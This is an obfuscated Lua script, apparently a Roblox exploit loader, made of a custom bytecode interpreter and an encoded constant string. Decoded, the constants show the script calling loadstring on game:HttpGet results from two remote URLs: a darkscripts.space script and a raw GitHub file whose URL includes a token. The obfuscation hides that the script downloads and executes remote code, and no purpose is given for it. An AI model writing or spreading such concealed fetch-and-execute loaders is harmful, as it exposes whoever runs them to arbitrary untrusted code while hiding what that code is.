--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v115=v5(v85,v19);v19=nil;return v115;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=0 -0 ;local v87;while true do if (v86==((0 + 0) -0)) then v87=(v31/(2^(v32-(1 -0))))%(((5 -1) -2)^(((v33-(620 -(555 + (1129 -(68 + 997))))) -(v32-((2202 -(226 + 1044)) -(857 + 74)))) + 1)) ;return v87-(v87%(569 -(367 + 201))) ;end end else local v88=0;local v89;while true do if (v88==(927 -(214 + 713))) then v89=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v89 + v89))>=v89) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 1 + 2 );v18=v18 + ((1311 -(87 + 263)) -(892 + 65)) ;return (v40 * (40022563 -23245347)) + (v39 * (121138 -55602)) + (v38 * (469 -213)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=181 -(67 + 113) ;local v44=(v20(v42,1 + 0 ,49 -29 ) * ((3 -1)^(24 + 8 + 0))) + v41 ;local v45=v20(v42,83 -62 ,822 -(368 + 423) );local v46=((v20(v42,984 -(802 + 150) )==(2 -1)) and  -(1 -0)) or 1 ;if (v45==(0 + 0)) then if (v44==0) then return v46 * (997 -(915 + 82)) ;else v45=2 -1 ;v43=(0 -0) + (18 -(10 + 8)) ;end elseif (v45==(2691 -644)) then return ((v44==(1187 -(1069 + 118))) and (v46 * ((2 -(3 -2))/0))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/((1 + 1)^52))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(442 -(416 + 26))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v66=1 + 0 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 1695 -(1229 + 466) ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90~= #"{") then else if (v91== #"\\") then v92=(function() return v93()~=0 ;end)();elseif (v91==(580 -(386 + 192))) then v92=(function() return v94();end)();elseif (v91~= #"xnx") then else v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90~=0) then else local v121=(function() return 1206 -(696 + 510) ;end)();local v122=(function() return;end)();while true do if (0~=v121) then else v122=(function() return 0 -0 ;end)();while true do if (v122~=(1263 -(1091 + 171))) then else v90=(function() return  #".";end)();break;end if (v122==(0 + 0)) then v91=(function() return v93();end)();v92=(function() return nil;end)();v122=(function() return 1;end)();end end break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v51=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do if (v107~=0) then else v98=(function() return 0 -0 ;end)();v99=(function() return nil;end)();v107=(function() return 3 -2 ;end)();end if (1==v107) then local v123=(function() return 374 -(123 + 251) ;end)();while true do if (v123==0) then while true do if (v98~=0) then else v99=(function() return v100();end)();if (v101(v99, #"!", #"!")==(0 -0)) then local v159=(function() return 698 -(208 + 490) ;end)();local v160=(function() return;end)();local v161=(function() return;end)();local v162=(function() return;end)();local v163=(function() return;end)();while true do if (2==v159) then while true do if (v160==0) then local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185~=0) then else v186=(function() return 0 + 0 ;end)();while true do if (v186==0) then v161=(function() return v101(v99,1 + 1 , #"asd");end)();v162=(function() return v101(v99, #".com",6);end)();v186=(function() return 837 -(660 + 176) ;end)();end if (v186==(1 + 0)) then v160=(function() return  #"!";end)();break;end end break;end end end if (v160~= #"nil") then else if (v101(v162, #"gha", #"91(")~= #"[") then else v163[ #"xnxx"]=(function() return v102[v163[ #"asd1"]];end)();end v103[v104]=(function() return v163;end)();break;end if (v160==2) then local v188=(function() return 0;end)();while true do if ((202 -(14 + 188))~=v188) then else if (v101(v162, #",", #".")~= #"!") then else v163[2]=(function() return v102[v163[677 -(534 + 141) ]];end)();end if (v101(v162,2,1 + 1 )~= #" ") then else v163[ #"asd"]=(function() return v102[v163[ #"asd"]];end)();end v188=(function() return 1;end)();end if (v188~=(1 + 0)) then else v160=(function() return  #"xnx";end)();break;end end end if (v160== #":") then local v189=(function() return 0 + 0 ;end)();local v190=(function() return;end)();while true do if (0~=v189) then else v190=(function() return 0 -0 ;end)();while true do if (v190==(0 -0)) then v163=(function() return {v105(),v105(),nil,nil};end)();if (v161==0) then local v194=(function() return 0 + 0 ;end)();local v195=(function() return;end)();while true do if (v194==0) then v195=(function() return 0 + 0 ;end)();while true do if (v195~=(396 -(115 + 281))) then else v163[ #"19("]=(function() return v105();end)();v163[ #"asd1"]=(function() return v105();end)();break;end end break;end end elseif (v161== #",") then v163[ #"91("]=(function() return v106();end)();elseif (v161==2) then v163[ #"xnx"]=(function() return v106() -((4 -2)^(14 + 2)) ;end)();elseif (v161== #"asd") then local v200=(function() return 0 -0 ;end)();local v201=(function() return;end)();while true do if (v200==(0 -0)) then v201=(function() return 867 -(550 + 317) ;end)();while true do if (v201~=0) then else v163[ #"-19"]=(function() return v106() -(2^16) ;end)();v163[ #"0836"]=(function() return v105();end)();break;end end break;end end end v190=(function() return 1;end)();end if ((1 -0)==v190) then v160=(function() return 2;end)();break;end end break;end end end end break;end if (v159==(0 -0)) then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if (v181~=(0 -0)) then else v182=(function() return 285 -(134 + 151) ;end)();while true do if (v182~=1) then else v159=(function() return 1666 -(970 + 695) ;end)();break;end if (v182==(0 -0)) then v160=(function() return 0;end)();v161=(function() return nil;end)();v182=(function() return 1991 -(582 + 1408) ;end)();end end break;end end end if (v159==1) then v162=(function() return nil;end)();v163=(function() return nil;end)();v159=(function() return 2;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end;end)();local v52=(function() return function(v108,v109,v110) local v111=(function() return 0;end)();while true do if (v111~=(0 -0)) then else local v124=(function() return 0;end)();while true do if (0~=v124) then else v108[v109-#"\\" ]=(function() return v110();end)();return v108,v109,v110;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #",",v57 do FlatIdent_69270,Type,Cons,v21,v24,v25,v58,v68=(function() return v50(FlatIdent_69270,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"-19"]=(function() return v21();end)();for v69= #"[",v23() do FlatIdent_7126A,Descriptor,v21,v20,v58,v53,v69,v22,v23=(function() return v51(FlatIdent_7126A,Descriptor,v21,v20,v58,v53,v69,v22,v23);end)();end for v70= #"!",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[7 -5 ];local v65=v60[(3155 -1328) -(1195 + (2086 -1457)) ];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=(851 -(20 + 830)) -0 ;local v76= -(242 -(187 + 54));local v77={};local v78={...};local v79=v12("#",...) -(781 -(162 + 618)) ;local v80={};local v81={};for v112=0 + 0 + 0 ,v79 do if ((v112>=v73) or (2874<2181)) then v77[v112-v73 ]=v78[v112 + 1 ];else v81[v112]=v78[v112 + 1 + 0 + 0 ];end end local v82=(v79-v73) + ((127 -(116 + 10)) -0) ;local v83;local v84;while true do v83=v71[v75];v84=v83[1 -0 ];if (v84<=(1 + 9)) then if (v84<=(1640 -(102 + 1271 + 263))) then if (v84<=(1001 -(451 + 549))) then if (v84>(0 + 0)) then do return;end else v81[v83[2]]=v83[3]~=(0 -0) ;end elseif ((v84<=((740 -(542 + 196)) -0)) or (2689<=343)) then local v127=v83[3 -1 ];local v128=v81[v83[1387 -(218 + 528 + 638) ]];v81[v127 + 1 + 0 ]=v128;v81[v127]=v128[v83[(1 + 4) -1 ]];elseif ((v84>(344 -(218 + 123))) or (1869==2009)) then v75=v83[1584 -(780 + 755 + 46) ];else do return;end end elseif (v84<=(7 + 0)) then if (v84<=(1 + (7 -3))) then v81[v83[562 -(306 + 254) ]]();elseif ((v84>(1 + (70 -(30 + 35)))) or (3546<2322)) then local v142=v83[3 -1 ];local v143,v144=v74(v81[v142](v13(v81,v142 + 1 ,v83[1470 -(899 + 568) ])));v76=(v144 + v142) -(1 + 0) ;local v145=0 -0 ;for v164=v142,v76 do local v165=603 -(268 + 335) ;while true do if ((v165==((200 + 90) -(60 + 230))) or (2082==4773)) then v145=v145 + (573 -(426 + 146)) ;v81[v164]=v143[v145];break;end end end else for v166=v83[2],v83[1 + (1259 -(1043 + 214)) ] do v81[v166]=nil;end end elseif (v84<=(1464 -(282 + (4438 -3264)))) then local v132=811 -(569 + 242) ;local v133;while true do if ((0 -(0 -0))==v132) then v133=v83[1 + (1213 -(323 + 889)) ];v81[v133]=v81[v133](v13(v81,v133 + (1025 -((2257 -(1126 + 425)) + (723 -(118 + 287)))) ,v76));break;end end elseif (v84>9) then v81[v83[2]]=v62[v83[1254 -(721 + 530) ]];else local v148=1271 -(945 + 326) ;local v149;local v150;while true do if (v148==(0 -0)) then v149=v83[2 + 0 ];v150=v81[v83[3]];v148=701 -(271 + (1154 -725)) ;end if ((3244>1055) and (v148==((3 -2) + (580 -(361 + 219))))) then v81[v149 + ((2622 -(118 + 1003)) -(1408 + 92)) ]=v150;v81[v149]=v150[v83[1090 -(461 + 625) ]];break;end end end elseif (v84<=((3813 -2510) -(993 + 295))) then if ((v84<=(1 + 11)) or (3313<=1778)) then if ((v84>((1502 -(53 + 267)) -(418 + 171 + 582))) or (1421>=2104)) then if (v81[v83[2]]==v83[2 + 2 ]) then v75=v75 + 1 + 0 ;else v75=v83[1 + (415 -(15 + 398)) ];end else v81[v83[984 -(18 + 964) ]]=v83[1 + 2 ]~=0 ;end elseif ((1812<=3249) and (v84<=(542 -(406 + 123)))) then v81[v83[1771 -(1749 + 20) ]]=v62[v83[1 + (7 -5) ]];elseif (v84==14) then local v152=v83[1324 -(1249 + 73) ];local v153,v154=v74(v81[v152](v13(v81,v152 + 1 + (377 -(142 + 235)) ,v83[1148 -(466 + 679) ])));v76=(v154 + v152) -(2 -1) ;local v155=0;for v170=v152,v76 do v155=v155 + 1 ;v81[v170]=v153[v155];end else local v156=v83[5 -3 ];v81[v156]=v81[v156](v13(v81,v156 + (1901 -(106 + 1794)) ,v76));end elseif (v84<=(81 -63)) then if ((1623<=1957) and (v84<=16)) then v81[v83[1 + 1 ]]=v83[1 + 2 ];elseif (v84>(50 -33)) then v81[v83[5 -3 ]]();elseif (v81[v83[2]]==v83[118 -(3 + 1 + 110) ]) then v75=v75 + (585 -(57 + 527)) ;else v75=v83[1430 -(41 + 1386) ];end elseif (v84<=(122 -(17 + 86))) then v81[v83[2]]=v83[3 + 0 + 0 ];elseif (v84>((1021 -(553 + 424)) -24)) then v75=v83[3];else for v173=v83[5 -3 ],v83[169 -(122 + 44) ] do v81[v173]=nil;end end v75=v75 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403303Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F623639383437336337342E6C7561036E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F63727378642F4B642F726566732F68656164732F6D61696E2F50673F746F6B656E3D4748534154306Q414358545537584356483745594B565947514B44575543495A59524A465641001B3Q0012133Q00014Q0014000100013Q0026113Q0002000100010004153Q00020001001213000100013Q00261100010005000100010004153Q0005000100120A000200023Q00120A000300033Q002009000300030004001213000500056Q000600014Q000E000300064Q000F00023Q00022Q001200020001000100120A000200023Q00120A000300033Q002009000300030004001213000500064Q000E000300054Q000F00023Q00022Q00120002000100010004153Q001A00010004153Q000500010004153Q001A00010004153Q000200012Q00033Q00017Q00",v9(),...);
